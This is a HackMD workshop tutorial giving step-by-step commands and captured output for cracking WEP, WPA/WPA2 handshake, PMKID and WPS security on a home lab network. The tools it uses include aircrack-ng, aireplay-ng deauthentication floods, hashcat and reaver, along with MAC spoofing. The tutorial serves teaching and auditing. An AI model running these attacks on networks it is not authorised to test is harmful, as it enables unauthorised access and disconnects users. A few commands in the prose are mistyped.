Try   HackMD

Workshop | Wi-Fi Hacking Lab

Workshop | Wi-Fi Hacking Lab
Johnny Pan
2022-10-08

This lab was created for educational purposes and thinking to improve and to audit the security of the following wireless networks:

  • Wired equivalent privacy (WEP)
  • Wi-Fi Protected Access (WPA)
  • Wi-Fi Protected Access v2 (WPA2)

Do it in your own wireless network.

Wireless hacking concepts

  • WEP
  • WPA
  • WPA2
  • Monitor Mode
  • Promiscous Mode
  • Packet Injection
  • 4-way handshake
  • EAPOL

Requirements

  • Wi-Fi AP/Router
  • Wi-Fi Adapter
  • Aircrack-NG suite
  • Linux OS

Hacking WEP

Changing to root user

[codeskill@wireless ~]$ sudo su

Identifying the wireless adapter

[root@wireless ~]# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Enabling monitor mode

Option #1 - Using ifconfig

[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# ifconfig wlan0 up

Option #2 - Using Airmong-ng

[root@wireless ~]# airmon-ng check wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    494 NetworkManager
   1944 wpa_supplicant
[root@wireless ~]# airmon-ng check kill

Killing these processes:

    PID Name
   1944 wpa_supplicant
[root@wireless ~]# airmon-ng start wlan0

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
[root@wireless ~]# iwconfig      
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Changing MAC address

[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# macchanger -r wlan0
[root@wireless ~]# ifconfig wlan0 up

Selecting WEP encrypted SSID

[root@wireless ~]# airodump-ng wlan0mon --encrypt wep
CH  6 ][ Elapsed: 48 s ][ 2022-10-09 23:59
 
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
 
00:18:39:E4:61:28  -40       26        0    0  11   54e  WEP  WEP    OPENSOURCE

Packet injection

[root@wireless ~]# besside-ng wlan0mon -c 6 -b 00:18:39:E4:61:28
[00:21:02] Let's ride
[00:21:02] Resuming from besside.log
[00:21:02] Appending to wpa.cap
[00:21:02] Appending to wep.cap
[00:21:02] Logging to besside.log
[00:21:02] | Scanning chan 06
[00:21:02] / Scanning chan 06
[00:21:02] / Attacking [OPENSOURCE] WEP - PING
[00:21:02] - Attacking [OPENSOURCE] WEP - PING
...
[00:21:03] Associated to OPENSOURCE AID [1]
[00:21:03] - Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] | Attacking [OPENSOURCE] WEP - GET REPLAY
[00:21:03] / Attacking [OPENSOURCE] WEP - GET REPLAY
...
[00:21:42] \ Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] | Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
[00:21:42] / Attacking [OPENSOURCE] WEP - FLOOD - 1 IVs rate 0 [0 PPS out] len 142
...
[00:23:18] - Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] \ Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
[00:23:18] | Attacking [OPENSOURCE] WEP - FLOOD - 20033 IVs rate 217 [308 PPS out] len 56
...
[00:42:56] | Attacking [OPENSOURCE] WEP - FLOOD - 44989 IVs rate 94 [193 PPS out] len 64
[00:42:56] \ Attacking [OPENSOURCE] WEP - FLOOD - 44999 IVs rate 94 [193 PPS out] len 64
[00:42:56] / Attacking [OPENSOURCE] WEP - FLOOD cracking - 45005 IVs rate 94 [193 PPS out] len 64
[00:42:56] Got key for OPENSOURCE [bf:53:9e:db:37] 45008 IVs
[00:42:56] Pwned network OPENSOURCE in 8:58 mins:sec
[00:42:56] TO-OWN [] OWNED [OPENSOURCE]
[00:42:56] All neighbors owned

Cracking wep.cap file

[root@wireless ~]# aircrack-ng ./wep.cap

Aircrack-ng 1.7 

                                                                       [00:00:01] Tested 67097 keys (got 45009 IVs)

   KB    depth   byte(vote)
    0    0/  1   BF(66560) D6(54272) 70(53504) 71(52480) 06(51968) 92(51968) C3(51200) 14(50944) 25(50944) 33(50688) EA(50688) 66(50432) 72(50176) C4(50176) 10(49920) 
    1    0/ 35   53(60160) 7E(53504) EE(53504) 0D(53248) 7F(52992) E2(52736) B9(52480) F0(52224) 03(51456) 18(51456) 8D(50944) F1(50944) D5(50688) 94(50432) BC(50432) 
    2    0/  3   9E(65792) 52(57088) 95(54528) C3(53248) B8(52992) 41(52480) 03(51712) CB(51712) CE(51712) 9F(51200) 0B(50944) 14(50944) 4B(50944) BE(50944) BA(50688) 
    3    0/  3   DB(65024) 23(57088) A6(54272) 62(52992) 3B(51968) 43(51712) 60(51712) AB(51712) B1(51712) 85(51456) B6(51456) BC(51200) CD(51200) 09(50944) C7(50944) 
    4  206/214   AC(41984) 44(41728) 47(41728) 52(41728) 8F(41728) 95(41728) B5(41728) C2(41728) CD(41728) ED(41728) 45(41472) 88(41472) B0(41472) DD(41472) FD(41472) 

                         KEY FOUND! [ BF:53:9E:DB:37 ] 
        Decrypted correctly: 100%

Hacking WPA/WPA2

Changing to root user

[codeskill@wireless ~]$ sudo su

Identifying the wireless adapter

[root@wireless ~]# iwconfig
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0     IEEE 802.11  ESSID:off/any  
          Mode:Managed  Access Point: Not-Associated   Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Enabling monitor mode

Option #1 - Using ifconfig

[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# ifconfig wlan0 up

Option #2 - Using Airmong-ng

[root@wireless ~]# airmon-ng check wlan0

Found 2 processes that could cause trouble.
Kill them using 'airmon-ng check kill' before putting
the card in monitor mode, they will interfere by changing channels
and sometimes putting the interface back in managed mode

    PID Name
    494 NetworkManager
   1944 wpa_supplicant
[root@wireless ~]# airmon-ng check kill

Killing these processes:

    PID Name
   1944 wpa_supplicant
[root@wireless ~]# airmon-ng start wlan0

PHY     Interface       Driver          Chipset

phy0    wlan0           ath9k_htc       Qualcomm Atheros Communications AR9271 802.11n
                (mac80211 monitor mode vif enabled for [phy0]wlan0 on [phy0]wlan0mon)
                (mac80211 station mode vif disabled for [phy0]wlan0)
[root@wireless ~]# iwconfig      
lo        no wireless extensions.

eth0      no wireless extensions.

wlan0mon  IEEE 802.11  Mode:Monitor  Frequency:2.457 GHz  Tx-Power=20 dBm   
          Retry short limit:7   RTS thr:off   Fragment thr:off
          Power Management:off

Changing MAC address

[root@wireless ~]# ifconfig wlan0 down
[root@wireless ~]# iwconfig wlan0 mode monitor
[root@wireless ~]# macchanger -r wlan0
[root@wireless ~]# ifconfig wlan0 up

Selecting WPA/WPA2 encrypted SSID

[root@wireless ~]# airodump-ng wlan0mon
 CH 13 ][ Elapsed: 1 min ][ 2022-10-10 23:03                                 
 
 BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                                                             
 00:18:39:E4:61:28  -50       41        6    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE 
 BE:A7:B9:14:DB:98  -57       40        0    0   6  130   WPA2 CCMP   PSK  ARTEMIS                                                                                                           
 BA:A7:B9:14:DB:98  -54       41        0    0   6  130   WPA2 CCMP   PSK  NARUTO                                                                                                            
 B6:A7:B9:14:DB:98  -57       42        0    0   6  130   WPA2 CCMP   PSK  TOTORO                                                                                                            
 B0:A7:B9:14:DB:98  -57       39        0    0   6  130   WPA2 CCMP   PSK  YOSHI                                                                                                    
 62:AF:97:C2:4E:24  -33       37        0    0   6  130   WPA2 CCMP   PSK  ARTEMIS                                                                                                           
 5E:AF:97:C2:4E:24  -33       40        0    0   6  130   WPA2 CCMP   PSK  NARUTO                                                                                                            
 5A:AF:97:C2:4E:24  -34       41        0    0   6  130   WPA2 CCMP   PSK  TOTORO                                                                                                            
 54:AF:97:C2:4E:24  -33       42        0    0   6  130   WPA2 CCMP   PSK  YOSHI
 
 BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes                                                                                                                                          
 00:18:39:E4:61:28  16:41:DA:4E:36:EA  -31    0 - 1e     0       23           

Monitor the network for a handshake

We press Ctrl+C and review the list of SSIDs. We look for the one we are interested in auditing. In this case we are going to work with OPENSOURCE.

A handshake occurs when an item connects to a network (e.g., when your computer connects to a router). You need to wait until a handshake occurs so you capture the data necessary to crack the password. To start monitoring, run the following command:

airodump channel <CHANNEL> bssid <MAC-AP> -w <CAPTURE-FILE> wlan0mon

In our case the values are the following:

CHANNEL = 6
MAC-AP = 00:18:39:E4:61:28
CAPTURE-FILE = wpa2

As long as this command stays running, you'll be monitoring for all connections and new handshakes.

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon

CH  6 ][ Elapsed: 0 s ][ 2022-10-10 23:25
    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

00:18:39:E4:61:28  -51 100       43        1    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes 

Deauth attack

A deauth attack sends deauthentication packets to the router you're trying to break into, causing uses to disconnect and requiring them to log back in. When a user logs back in, you will be provided with a handshake. If you don't do a deauth attack, you might have to wait around for a long time for a handshake to complete, you'll need that handshake to crack the password.

If you already see a line with the tag "WPA handshake:" followed by a MAC address in the output of the airodump-ng command, skip this step because you have what you need to crack the password and don't need to send deauth packets.

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH  6 ][ Elapsed: 1 min ][ 2022-10-10 30:24 ][ WPA handshake: 00:18:39:E4:61:28
    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID

00:18:39:E4:61:28  -48 100      690       31    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes 
    

Wait for something to connect to the network. Once you see two BSSID addresses appear next to each other one labeled BSSID (the Wi-Fi router) and the other labeled STATION (the computer or other device) this this means a client is connected. To force them into a handshake, you'll now send them deauth packets that kill their connection.

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH  6 ][ Elapsed: 6 s ][ 2022-10-10 23:38 ]                       

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
00:18:39:E4:61:28  -45 100       68       28    6   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
    
00:18:39:E4:61:28  16:41:DA:4E:36:EA  -43    1e- 1e   177      129  EAPOL  OPENSOURCE

Open a new terminal. Make sure airodump-ng is still running in original terminal window, and drag it to another place on your desktop so both terminals are visible.

Send the deauth packets. Run this command, replacing STATION BSSID with the BSSID of the client that connected to the network, and NETWORK BSSID with the router's BSSID: aireplay-ng -0 2 -a STATION BSSID -c NETWORK BSSID mon0.

This command will send 2 deauth packets to disconnect the client from the network. Don't try to send more than this sending too many packets could prevent the client from reconnecting and generating the handshake.

As long as you're close enough to the target client, they'll be disconnected from the router and forced to reconnect with a handshake. If this doesn't work, move closer to the client.
As soon as the client reconnects, all of the information you'll need to crack the password will be available.

[root@wireless ~]# aireplay-ng -0 2 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon   
23:47:41  Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:47:41  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|53 ACKs]
23:47:42  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [ 0|57 ACKs]   

Cracking wpa2.cap file

When you see WPA handshake: <AP MAC ADDRESS>, you can cracking the password.

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w wpa2 wlan0mon
CH  6 ][ Elapsed: 5 mins ][ 2022-10-10 23:52 ][ WPA handshake: 00:18:39:E4:61:28
    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
00:18:39:E4:61:28  -49 100     3257       26    0   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes  

In the original terminal window, press Control+C to quit airodump-ng. This stops the dump and saves a file ending with .cap to your desktop.

Decompress the rockyou.txt wordlist. To crack the password, you'll need a wordlist. Fortunately, since you're using Kali Linux, you have several already in /usr/share/wordlists. The one we'll want to use is called rockyou.txt, but it's zipped up by default. To unzip it, run gzip -d /usr/share/wordlists/rockyou.txt.gz.

You won't be able to crack the password if it's not in the wordlist. You can always try one of the other wordlists if rockyou.txt doesn't crack the password.

apt install wordlists
gzip -d /usr/share/wordlists/rockyou.txt.gz

Run the command to crack the password. You'll use a tool called aircrack-ng, which come with Kali Linux, to do so. The command is aircrack-ng -a2 -b NETWORK BSSID -w /usr/share/wordlists/rockyou.txt /root/Desktop/*.cap. Replace NETWORK BSSID with the BSSID for the router.

Depending on the strength of the password and the speed of your CPU, this process can take anywhere from a few hours to a few days.
If you're cracking static WEP key network instead of a WPA/WPA2-PSK network, replace -a2 with -a1.

[root@wireless ~]# aircrack-ng -a2 -b 00:18:39:E4:61:28 -w /usr/share/wordlists/rockyou.txt ./wpa2-01.cap

Aircrack-ng 1.7 

      [00:00:00] 2171/10303727 keys tested (5462.94 k/s) 

      Time left: 31 minutes, 25 seconds                          0.02%

                           KEY FOUND! [ qwerty123 ]


      Master Key     : 2C 08 85 AD 79 69 79 A6 8E 1D A2 C3 87 5A 2F 16 
                       92 5F F4 87 E0 57 41 9C 27 CC AB 24 F2 29 49 4E 

      Transient Key  : 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 
                       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 

      EAPOL HMAC     : DF BB 43 33 70 11 D9 CB D3 F6 12 FF 42 BE CB 9A

Hacking PMKID

Installing the needed tools

[root@wireless ~]# apt install hcxdumptool
[root@wireless ~]# apt install hcxtools

Capturing PMKID packages

[root@wireless ~]# hcxdumptool -i wlan0 -o test.pcapng --enable_status=1
initialization of hcxdumptool 6.2.6 (depending on the capabilities of the device, this may take some time)...
interface is already in monitor mode, skipping ioctl(SIOCSIWMODE) and ioctl(SIOCSIFFLAGS) system calls

start capturing (stop with ctrl+c)
NMEA 0183 SENTENCE........: N/A
PHYSICAL INTERFACE........: phy3
INTERFACE NAME............: wlan0
INTERFACE PROTOCOL........: IEEE 802.11
INTERFACE TX POWER........: 20 dBm (lowest value reported by the device)
INTERFACE HARDWARE MAC....: 00c0cab1a5fc (not used for the attack)
INTERFACE VIRTUAL MAC.....: 00c0cab1a5fc (not used for the attack)
DRIVER....................: mt76x2u
DRIVER VERSION............: 5.18.0-kali7-amd64
DRIVER FIRMWARE VERSION...: 0.0.00-b1
openSSL version...........: 1.0
ERRORMAX..................: 100 errors
BPF code blocks...........: 0
FILTERLIST ACCESS POINT...: 0 entries
FILTERLIST CLIENT.........: 0 entries
FILTERMODE................: unused
WEAK CANDIDATE............: 12345678
ESSID list................: 0 entries
ACCESS POINT (ROGUE)......: a468bcb13022 (BROADCAST WILDCARD used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13023 (BROADCAST OPEN used for the attack)
ACCESS POINT (ROGUE)......: a468bcb13024 (used for the attack and incremented on every new client)
CLIENT (ROGUE)............: d85dfb0ab897
EAPOLTIMEOUT..............: 20000 usec
EAPOLEAPTIMEOUT...........: 2500000 usec
REPLAYCOUNT...............: 63589
ANONCE....................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE....................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7

TIME     FREQ/CH  MAC_DEST     MAC_SOURCE   ESSID [FRAME TYPE]
01:11:31 2442/7   6872c30f193c 54af97c24e24 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4232 RC:63589 KDV:2]
01:11:47 2462/11  6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:6305 RC:63589 KDV:2]
01:13:50 2412/1   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4445 RC:63589 KDV:2]
01:13:54 2417/2   94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1563 RC:63589 KDV:2]
01:13:56 2422/3   6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:840 RC:63589 KDV:2]
01:14:00 2427/4   6872c30f193c a468bcb13027 YOSHI [EAPOL:M1M2ROGUE EAPOLTIME:4187 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3132 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:1575 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:2548 RC:63589 KDV:2]
01:14:05 2432/5   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:5387 RC:63589 KDV:2]
01:14:08 2437/6   94e6f78fdb99 a468bcb1302d ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:1818 RC:63589 KDV:2]
01:14:17 2447/8   a86daa1620a1 a468bcb1302c SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:3958 RC:63589 KDV:2]
01:16:17 5805/161 a86daa1620a1 54af97c24e25 SAITAMA [EAPOL:M1M2ROGUE EAPOLTIME:4022 RC:63589 KDV:2]
01:16:19 5805/161 1c4d660367fb 6aaf97c24e25 ARTEMIS [EAPOL:M1M2ROGUE EAPOLTIME:2319 RC:63589 KDV:2]

Converting PCAP file to Hashcat file

[root@wireless ~]# hcxpcapngtool -E essidlist -I identitylist -U usernamelist -o test.22000 test.pcapng 
hcxpcapngtool 6.2.7 reading from test.pcapng...

summary capture file
--------------------
file name................................: test.pcapng
version (pcapng).........................: 1.0
operating system.........................: Linux 5.18.0-kali7-amd64
application..............................: hcxdumptool 6.2.6
interface name...........................: wlan0
interface vendor.........................: 00c0ca
openSSL version..........................: 1.0
weak candidate...........................: 12345678
MAC ACCESS POINT.........................: a468bcb13024 (incremented on every new client)
MAC CLIENT...............................: d85dfb0ab897
REPLAYCOUNT..............................: 63589
ANONCE...................................: cad7dd6c8c75d9a5af42a1a29399dc14c5db8b0100d6c7e4775aa47fc1209146
SNONCE...................................: 4eb39e5d37be518afb627de644677728ec23c81876d9fb772719fc391a9e35d7
timestamp minimum (GMT)..................: 14.10.2022 01:11:07
timestamp maximum (GMT)..................: 14.10.2022 01:23:11
used capture interfaces..................: 1
link layer header type...................: DLT_IEEE802_11_RADIO (127)
endianness (capture system)...............: little endian
packets inside...........................: 3780
packets received on 2.4 GHz..............: 1637
packets received on 5 GHz................: 1754
ESSID (total unique).....................: 67
BEACON (total)...........................: 79
BEACON on 2.4 GHz channel (from IE_TAG)..: 1 2 3 4 5 6 8 9 10 11 
BEACON on 5/6 GHz channel (from IE-TAG)..: 36 40 44 48 149 161 
BEACON (SSID wildcard/unset).............: 4
BEACON (SSID zeroed).....................: 2
ACTION (total)...........................: 33
ACTION (containing ESSID)................: 31
PROBEREQUEST.............................: 17
PROBEREQUEST (directed)..................: 2
PROBERESPONSE (total)....................: 59
AUTHENTICATION (total)...................: 75
AUTHENTICATION (OPEN SYSTEM).............: 75
ASSOCIATIONREQUEST (total)...............: 19
ASSOCIATIONREQUEST (PSK).................: 17
REASSOCIATIONREQUEST (total).............: 2
REASSOCIATIONREQUEST (PSK)...............: 2
EAPOL messages (total)...................: 3435
EAPOL RSN messages.......................: 3435
EAPOLTIME gap (measured maximum usec)....: 1479862
EAPOL ANONCE error corrections (NC)......: working
REPLAYCOUNT gap (suggested NC)...........: 2
EAPOL M1 messages (total)................: 2581
EAPOL M2 messages (total)................: 810
EAPOL M3 messages (total)................: 22
EAPOL M4 messages (total)................: 22
EAPOL pairs (total)......................: 8526
EAPOL pairs (best).......................: 17
EAPOL ROGUE pairs........................: 11
EAPOL pairs written to 22000 hash file...: 17 (RC checked)
EAPOL M12E2 (challenge)..................: 12
EAPOL M32E2 (authorized).................: 5
PMKID (useless)..........................: 40
PMKID (total)............................: 160
PMKID (best).............................: 6
PMKID ROGUE..............................: 5
PMKID written to 22000 hash file.........: 6
malformed packets (total)................: 3
BEACON error (total malformed packets)...: 3

frequency statistics from radiotap header (frequency: received packets)
-----------------------------------------------------------------------
 2412: 275       2417: 180       2422: 55        2427: 181
 2432: 92        2437: 100       2442: 11        2447: 92
 2452: 302       2457: 76        2462: 224       2467: 48
 2472: 1         5180: 1220      5200: 3         5220: 164
 5240: 139       5745: 1         5765: 71        5785: 59
 5805: 95        5825: 2

session summary
---------------
processed pcapng files................: 1

Cracking PMKID

hashcat -m 22000 test.22000 -a 0 --kernel-accel=1 -w 4 --force '/usr/share/wordlists/rockyou.txt' Session..........: hashcat Status...........: Running Hash.Mode........: 22000 (WPA-PBKDF2-PMKID+EAPOL) Hash.Target......: test.22000 Time.Started.....: Fri Oct 14 01:36:27 2022, (5 mins, 54 secs) Time.Estimated...: Tue Oct 18 11:29:14 2022, (4 days, 9 hours) Kernel.Feature...: Pure Kernel Guess.Base.......: File (/usr/share/wordlists/rockyou.txt) Guess.Queue......: 1/1 (100.00%) Speed.#1.........: 488 H/s (0.94ms) @ Accel:1 Loops:1024 Thr:1 Vec:8 Recovered........: 0/23 (0.00%) Digests (total), 0/23 (0.00%) Digests (new), 0/13 (0.00%) Salts Progress.........: 496666/186477005 (0.27%) Rejected.........: 332644/496666 (66.98%) Restore.Point....: 38204/14344385 (0.27%) Restore.Sub.#1...: Salt:7 Amplifier:0-1 Iteration:0-1 Candidate.Engine.: Device Generator Candidates.#1....: september30 -> september22 [s]tatus [p]ause [b]ypass [c]heckpoint [f]inish [q]uit =>

Hacking WPS

wash -i wlan0mon
BSSID               Ch  dBm  WPS  Lck  Vendor    ESSID
--------------------------------------------------------------------------------
00:22:75:E2:8C:2A    1  -50  1.0  No   RalinkTe  OPENSOURCE
reaver -i wlan0mon -b 00:22:75:E2:8C:2A -d 30 -S -N -vv
Reaver v1.6.6 WiFi Protected Setup Attack Tool
Copyright (c) 2011, Tactical Network Solutions, Craig Heffner <cheffner@tacnetsol.com>

[+] Waiting for beacon from 00:22:75:E2:8C:2A
[+] Switching wlan0mon to channel 1
[+] Received beacon from 00:22:75:E2:8C:2A
[+] Vendor: RalinkTe
[+] Trying pin "12345670"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Sending identity response
[+] Received identity request
[+] Received M1 message
[+] Sending M2 message
[+] Received M1 message
[+] Received M1 message
[+] Received M1 message
[+] Received M3 message
[+] Sending M4 message
[+] Received M3 message
[+] Received M3 message
[+] Received WSC NACK
[+] Sending WSC NACK
[+] Trying pin "00005678"
[+] Sending authentication request
[+] Sending association request
[+] Associated with 00:22:75:E2:8C:2A (ESSID: OPENSOURCE)
[+] Sending EAPOL START request
[root@wireless ~]# reaver -i wlan0mon -b 00:22:75:E2:8C:2A -p 19806716 -vv

How to discover hidden SSID

[root@wireless ~]# airodump-ng wlan0mon
CH  7 ][ Elapsed: 12 s ][ 2022-10-11 22:42                                   
    
BSSID              PWR  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                         
                               
00:18:39:E4:61:28  -40        7        0    0   6   54e  WPA2 CCMP   PSK  <length: 10>                                                                                                      
62:AF:97:C2:4E:24  -34        7        0    0   6  130   WPA2 CCMP   PSK  ARTEMIS                                                                                                           
5E:AF:97:C2:4E:24  -33        7        0    0   6  130   WPA2 CCMP   PSK  NARUTO                                                                                                            
5A:AF:97:C2:4E:24  -34        9        0    0   6  130   WPA2 CCMP   PSK  TOTORO                                                                                                            
54:AF:97:C2:4E:24  -33        9        0    0   6  130   WPA2 CCMP   PSK  YOSHI                                                                                                                                              

<length: 10>

Capture packages

[root@wireless ~]# airodump-ng --channel 6 --bssid 00:18:39:E4:61:28 -w hidden-ssid wlan0mon
CH  6 ][ Elapsed: 24 s ][ 2022-10-11 22:51                                   
    
BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID                                                                   
    
00:18:39:E4:61:28  -43 100      265        0    0   6   54e  WPA2 CCMP   PSK  <length: 10>                                                                 
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes  
[root@wireless ~]# tshark -r hidden-ssid-01.cap "wlan.ta == 00:18:39:E4:61:28"
Running as user "root" and group "root". This could be dangerous.
    2   0.055007 Cisco-Li_e4:61:28 → Broadcast    802.11 138 Beacon frame, SN=3347, FN=0, Flags=........, BI=100, SSID=\000\000\000\000\000\000\000\000\000\000 

Open Wireshark

wlan.ta==00:18:39:E4:61:28

[root@wireless ~]# aireplay-ng -0 10 -a 00:18:39:E4:61:28 -c 16:41:DA:4E:36:EA wlan0mon 
23:04:51  Waiting for beacon frame (BSSID: 00:18:39:E4:61:28) on channel 6
23:04:52  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:52  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [118|118 ACKs]
23:04:53  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [121|121 ACKs]
23:04:53  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:54  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [116|116 ACKs]
23:04:55  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [117|117 ACKs]
23:04:55  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [114|114 ACKs]
23:04:56  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [94|94 ACKs]
23:04:56  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [143|143 ACKs]
23:04:57  Sending 64 directed DeAuth (code 7). STMAC: [16:41:DA:4E:36:EA] [111|111 ACKs]

CH  6 ][ Elapsed: 6 s ][ 2022-10-11 23:38 ]                       

BSSID              PWR RXQ  Beacons    #Data, #/s  CH   MB   ENC CIPHER  AUTH ESSID
    
00:18:39:E4:61:28  -45 100       68       28    6   6   54e  WPA2 CCMP   PSK  OPENSOURCE
    
BSSID              STATION            PWR   Rate    Lost    Frames  Notes  Probes
    
00:18:39:E4:61:28  16:41:DA:4E:36:EA  -43    1e- 1e   177      129  EAPOL  OPENSOURCE

MAC Address Vendors

You can use the following link to identified the MAC address vendor

https://macvendors.com/

Or using the following command on Kali

[root@wireless ~]# grep -i <FIRST 6 CHARS OF MAC ADDRESS> /var/lib/ieee-data/oui.txt

Restore the services

[root@wireless ~]# systemctl start NetworkManager.service
[root@wireless ~]# systemctl start wpa_supplicant.service

References